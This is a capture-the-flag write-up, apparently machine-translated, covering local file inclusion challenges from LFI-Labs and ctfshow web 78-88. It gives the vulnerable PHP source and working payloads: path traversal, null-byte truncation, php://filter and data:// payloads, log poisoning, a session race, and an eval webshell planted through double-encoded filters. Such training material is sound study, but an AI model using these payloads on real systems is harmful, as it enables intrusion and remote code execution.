table of Contents
Lfi-Labs
Description
This environment is built for phpstudy, and phpinfo.php exists in the root directory of the website; take this as an example.
LFI-1
Source code:
<?php
include($_GET["page"]);
?>
payload:
?page=phpinfo.php
I found with no success, to use ../go back one level
LFI-2
Source code:
<?php
include("includes/".$_GET['library'].".php");
?>
Here, .phpsuffixes are added to the input file containing variables .
Example: Enter phpinfo.php, it will become phpinfo.php.php; this file obviously does not exist.
Use %00 to cut off here.
payload:
?library=../../phpinfo.php%00
Use %00 to truncate the note:
(1) The php version is less than 5.3.4.
(2) The magic_quotes_gpc of php is OFF.
If both are satisfied, but not successful, you can use burpsuite to capture and replay:
But I still can't do it here, it's cracked.
LFI-3
Source code:
<?php
if (substr($_GET['file'], -4, 4) != '.php')
echo file_get_contents($_GET['file']);
else
echo 'You are not allowed to see source files!'."\n";
?>
Here is an audit, the last four digits of the input parameter cannot be .php.
Here the use of properties under the Windows environment: When setting the file extension, if the name contains the suffix .will automatically be omitted.
Therefore, the payload:
?file=../../phpinfo.php.
LFI-4
Source code:
<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>
The parameters are filtered using the addslashes() function:
The addslashes() function returns a string with a backslash before a predefined character.
The predefined characters are:
Single quotation mark (')
Double quotation mark (")
Backslash (\)
NULL
But this question will automatically add a .php suffix at the end.
payload:
?class=../../../../../phpinfo
LFI-5
Source code:
<?php
$file = str_replace('../', '', $_GET['file']);
if(isset($file))
{
include("pages/$file");
}
else
{
include("index.php");
}
?>
Replace ./ with empty, double-write it.
ctfshow
web 78
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
payload:
?file=php://filter/convert.base64-encode/resource=flag.php
web 79
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
PHP is filtered.
payload:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php);?>
web 80-81
The log contains a Trojan horse that uploads a sentence to get a webshell
Log file: /var/log/nginx/access.log
Use burpsuite to capture the package and add a sentence of Trojan horse to the User-Agent header:
Use a chopper or ant sword to connect:
web 82-86
Use session.upload_progress for file inclusion
POC:
#poc.php
<!DOCTYPE html>
<html>
<body>
<form action="ip地址" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="1234" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
Upload any file and make the following modifications: the
value here is just for adding blasting parameters, the value does not matter.
In the subject environment, pass in ?file=/tmp/sess_flag, capture the packet, and set the blasting parameters: blasting
on both sides at the same time, through continuous blasting, there will always be the result requested when the session is not cleared.
Get the flag file name and modify the script:
<?php system('cat fl0g.php');?>
Continue to blast and get the flag:
web 87
Talk about the magical use of php://filter
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
1. Use base64-decode method to remove<?php die('大佬别秀了');?>
php://filter/write=convert.base64-decode/resource=3.php
2. Add aa to complete phpdie to meet base64 encoding conditions.
3. Url double-encode the file parameter
%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%33%25%32%65%25%37%30%25%36%38%25%37%30
4. Pass in the content parameter
content=aaPD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==
PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg== --> <?php @eval($_POST[1]);?>
5. Chopper, Ant Sword connect to 3.php, get webshell
web 88
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
payload:
?file=data://text/plain;base64,PD9waHAgICBzeXN0ZW0oIm5sICoucGhwIik7Pz4
Delete the = at the end